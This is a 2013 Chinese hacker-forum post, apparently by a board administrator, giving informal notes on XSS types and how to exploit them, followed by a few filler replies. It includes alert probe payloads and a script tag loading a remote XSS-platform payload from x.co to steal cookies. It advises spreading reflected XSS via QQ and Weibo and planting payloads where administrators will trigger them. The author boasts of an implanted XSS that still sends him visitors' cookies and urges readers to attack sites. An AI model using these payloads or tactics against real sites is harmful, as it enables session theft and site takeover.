搜索
查看: 876|回复: 3

小菜XSS小计

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-5 18:27:26 来自手机 | 显示全部楼层 |阅读模式
由于本人是手机党,所以此文非常之不高深,纯属小菜的一个随记,认真你就输了,本文不探讨如何寻找xss漏洞*^_^*
一,定义
1.盲打:个人理解,就是纯属测试,有反应就继续深入。
2.反射型XSS:个人理解,需要用户点击才能触发的XSS,类似于钓鱼。非持久型。
3.持久型XSS:个人理解,利用各种方式插进数据库,导致成为一个持久性的。
4.DOMXSS,个人理解,类似于反射型,只是寻找此类XSS比反射性的难,有显性,隐性等。
5.Flashxss:利用缺陷的flash,swf继续X
二:利用方法及用处
1.盲打:喜欢用一些基础语句,比如在搜索框,keyboard=后面插上<script>alert("xss")</script>,<img src="javascript:alert('XSS')">等一些基础语句,看他弹不弹框框。仅做刚开始的test之用。
2.反射型:也是利用一些基础代码,然后在盲打的基础上继续深入,比如盗取cookies,原先都是利用js代码。现在呢,俺们有xss平台,so seay~,如,<script src=http://x.co/1Ou19></script>,这就是某平台xss代码,可盗取cookies。反射型的需要用户点击,so,可以通过QQ发给对方[淫荡了。。。]可以在名气高的微博里评论。对于目标站。可以在个人资料、留言板里插入,然后坐等管理员上线,进入后台~反射型的可以盗取Cookies,页面劫持。页面截图,钓鱼,蠕虫等。
3.持久型:持久嘛,那必须持久~通过发帖,修改某元素,通过colour=,通过链接等方式,让其插入数据库[当然,也要让它执行的起来。],说个实例吧,我也不知道我啥时往那个网站X了一下,反正只要有用户进入那网站,用户Cookies就会跑来。。可用于csrf,跨站,键盘记录等。
4.DomXSS:多存在于脚本中,有时,看源代码就可以找到漏洞所在,有时他也会变隐性,还会跟javascript各种家伙搞一起。当然。他也能盗取cookies。
5.FlashXSS:这个嘛,肯定首先要找到有缺陷的flash,因为我也不太懂。所以一笔带过。。恶意的swf在iframe下能获取到swf所在域的cookies。
三:总结
如果在xss横行的年代,你不X你就out啦~多X有益健康~有些不能拿下的站,实际上可以通过xss轻松搞定。大家可以去乌云或者看看瘦子的关于xss的书籍,非常不错~
本人由于手机党,不能搭配图和事例,如果有机会,会再续一篇。
专业回帖 该用户已被删除
发表于 2013-10-5 18:46:36 | 显示全部楼层
俺是专业顶贴滴~~~
854955425 该用户已被删除
发表于 2013-10-5 19:06:39 | 显示全部楼层
我是来刷分的,嘿嘿
白客丶小俊 该用户已被删除
发表于 2013-11-13 21:12:55 | 显示全部楼层
┏ (^ω^)=&#9758;回帖是一种美德
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表